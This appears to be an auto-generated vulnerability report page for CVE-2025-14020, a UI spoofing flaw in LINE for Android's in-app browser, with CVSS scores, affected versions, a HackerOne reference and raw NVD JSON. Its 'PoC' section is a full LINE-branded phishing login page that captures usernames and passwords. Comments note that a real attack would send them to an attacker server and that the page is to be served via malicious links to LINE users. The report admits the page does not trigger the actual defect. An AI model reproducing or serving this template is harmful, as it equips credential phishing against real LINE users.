Security Vulnerability Report
CVE-2025-14020 CVSS 5.4 MEDIUM

Published: 2025-12-15 07:15:51
Last Modified: 2025-12-18 02:04:03

Description

LINE client for Android versions prior to 14.20 contains a UI spoofing vulnerability in the in-app browser where the full-screen security Toast notification is not properly re-displayed when users return from another application, potentially allowing attackers to conduct phishing attacks by impersonating legitimate interfaces.

CVSS Details

CVSS Score: 5.4
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N (the metric marked "Secondary" in the raw JSON record)
NVD Primary Metric: 4.3 MEDIUM, CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N (differs from the vector above only in rating confidentiality impact as None rather than Low)
Weakness: CWE-451 (User Interface (UI) Misrepresentation of Critical Information)

Configurations (Affected Products)

cpe:2.3:a:linecorp:line:*:*:*:*:*:android:*:* - VULNERABLE
LINE Android < 14.20

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only. Note that it is a mock login page that simulates the missing Toast by hiding its own warning banner; it does not itself trigger the LINE client defect, which lies in the in-app browser failing to re-display the full-screen security Toast when the user returns from another application.
```javascript
// CVE-2025-14020 PoC - UI Spoofing via In-App Browser
// This PoC demonstrates the UI spoofing vulnerability in LINE Android's in-app browser
const phishingPage = `
<!DOCTYPE html>
<html>
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>LINE Login</title>
  <style>
    * { margin: 0; padding: 0; box-sizing: border-box; }
    body {
      font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, sans-serif;
      background: linear-gradient(135deg, #00B900 0%, #00A800 100%);
      display: flex; justify-content: center; align-items: center;
      min-height: 100vh;
    }
    .login-container {
      background: white; border-radius: 16px; padding: 40px 30px;
      width: 90%; max-width: 400px; box-shadow: 0 10px 40px rgba(0,0,0,0.2);
    }
    .line-logo { text-align: center; margin-bottom: 30px; }
    .line-logo img { width: 80px; height: 80px; }
    h2 { text-align: center; color: #333; margin-bottom: 30px; font-size: 24px; }
    .input-group { margin-bottom: 20px; }
    .input-group label { display: block; margin-bottom: 8px; color: #666; font-size: 14px; }
    .input-group input {
      width: 100%; padding: 14px; border: 2px solid #e0e0e0; border-radius: 8px;
      font-size: 16px; transition: border-color 0.3s;
    }
    .input-group input:focus { outline: none; border-color: #00B900; }
    .login-btn {
      width: 100%; padding: 16px; background: #00B900; color: white; border: none;
      border-radius: 8px; font-size: 18px; font-weight: bold; cursor: pointer;
      transition: background 0.3s;
    }
    .login-btn:hover { background: #009900; }
    .security-notice {
      /* Hidden to simulate missing Toast notification
         (CSS has no // comments; the original // line swallowed the position rule) */
      display: none;
      position: fixed; top: 0; left: 0; right: 0;
      background: #ff3b30; color: white; padding: 10px;
      text-align: center; font-size: 14px;
    }
  </style>
</head>
<body>
  <div class="security-notice" id="securityNotice">
    ⚠️ Security Warning: You are on a third-party website
  </div>
  <div class="login-container">
    <div class="line-logo">
      <img src="https://scdn.line-apps.com/line/img/ogp/logo.png" alt="LINE">
    </div>
    <h2>LINE Login</h2>
    <form id="phishingForm">
      <div class="input-group">
        <label>Email or Phone Number</label>
        <input type="text" id="credentials" required placeholder="Enter your email or phone">
      </div>
      <div class="input-group">
        <label>Password</label>
        <input type="password" id="password" required placeholder="Enter your password">
      </div>
      <button type="submit" class="login-btn">Log In</button>
    </form>
  </div>
  <script>
    // Simulate the vulnerability: hide security notice after context switch
    document.addEventListener('visibilitychange', function() {
      if (document.hidden) {
        // User switched apps - security notice should reappear but doesn't
        console.log('User left the page - Toast should re-display');
      }
    });
    // Capture credentials
    document.getElementById('phishingForm').addEventListener('submit', function(e) {
      e.preventDefault();
      const credentials = document.getElementById('credentials').value;
      const password = document.getElementById('password').value;
      // In real attack, send to attacker server
      console.log('Captured credentials:', { user: credentials, pass: password });
      alert('Login successful! (Credentials captured)');
    });
  </script>
</body>
</html>
`;
// Usage: Serve this HTML page via a malicious link sent to LINE users
console.log('PoC generated. Serve via web server and send link to LINE Android users.');
console.log('When users return from other apps, security Toast does not re-appear.');
```

References

https://hackerone.com/reports/2547989 (Permissions Required, Third Party Advisory)
Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-14020",
    "sourceIdentifier": "[email protected]",
    "published": "2025-12-15T07:15:50.720",
    "lastModified": "2025-12-18T02:04:03.153",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "LINE client for Android versions prior to 14.20 contains a UI spoofing vulnerability in the in-app browser where the full-screen security Toast notification is not properly re-displayed when users return from another application, potentially allowing attackers to conduct phishing attacks by impersonating legitimate interfaces."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N",
            "baseScore": 5.4,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "REQUIRED",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 2.5
        },
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N",
            "baseScore": 4.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "REQUIRED",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "type": "Secondary",
        "description": [
          {"lang": "en", "value": "CWE-451"}
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:linecorp:line:*:*:*:*:*:android:*:*",
                "versionEndExcluding": "14.20.0",
                "matchCriteriaId": "33F31182-C6E7-4A69-8CB3-3CC27B90C42A"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://hackerone.com/reports/2547989",
        "source": "[email protected]",
        "tags": ["Permissions Required", "Third Party Advisory"]
      }
    ]
  }
}
```